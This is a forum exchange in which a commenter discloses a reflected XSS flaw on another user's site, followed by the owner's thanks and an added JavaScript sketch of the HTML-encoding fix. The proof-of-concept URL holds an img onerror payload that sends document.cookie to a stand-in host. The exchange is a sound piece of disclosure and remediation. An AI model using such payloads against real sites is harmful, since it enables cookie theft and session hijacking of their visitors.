comment by acyclicks
acyclicks  ·  3575 days ago  ·  post: Ruin My Website

Yeah, I was thinking of someone injecting some JS code into a link, and getting you to click on it. If you have no dynamic content on the domain, then you should be safe. Also I can't imagine anyone would normally bother; I just genuinely found the title+exploit combination funny.

POC:

https://www.fuzzjunket.com/ruin-my-website/?October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E

HTML-encoding the string before doing the replacement should fix it if you can be bothered.

Pseudo-edit: Just saw you already pushed a fix. That was fast. The POC did work before the fix.
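
Added example, not part of acyclicks's comment and not the site's own code: a sketch of the fix suggested above (HTML-encode the value before doing the replacement), run against the query string from the POC link. The function names and the sample page markup are assumptions.

```javascript
// Added example. Function names and SAMPLE_PAGE are assumptions, not the site's code.

// Constructed sample markup standing in for the page being rewritten.
const SAMPLE_PAGE = '<p>It is October and the leaves are falling.</p>';

// Query string copied from the POC link in the comment above.
const POC_QUERY = 'October=%3Cimg%20src%3D%22empty.gif%22%20onerror%3D%22this.src%3D%27//example.com/%27%20%2B%20document.cookie;%22%20/%3E';

// Encode the characters that let text break out into markup or an attribute.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Make a word safe to use literally inside a RegExp.
function escapeRegExp(word) {
  return word.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
}

// Replace each query-parameter name found in the page with its HTML-encoded value.
function applyReplacements(pageHtml, queryString) {
  const values = new Map();
  for (const [word, value] of new URLSearchParams(queryString)) {
    if (word) values.set(word, escapeHtml(value)); // encode BEFORE replacing
  }
  if (values.size === 0) return pageHtml;
  // One pass over the page, so inserted text is never rescanned for more words.
  const pattern = new RegExp([...values.keys()].map(escapeRegExp).join('|'), 'g');
  // Function replacement keeps "$&"-style sequences in a value literal.
  return pageHtml.replace(pattern, (match) => values.get(match));
}

// The POC value now renders as visible text instead of an <img> element.
console.log(applyReplacements(SAMPLE_PAGE, POC_QUERY));
```

Encoding the value this way covers HTML text and quoted-attribute positions. A word that also occurs inside a script block or an unquoted attribute of the page would need encoding specific to that context.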



StJohn  ·  3575 days ago

Oooh, thank you! I'm aware inviting the Internet to ruin my site is probably like poking a sleeping dragon, but I try to stay on top of any security risks and I'm always glad to get pointers. I figured any injection attacks couldn't affect anyone but the person viewing the website, but I hadn't considered anyone trying to hook me with their nefarious schemes. The cheek. "Infamy! Infamy! They've all got it in for me!"

---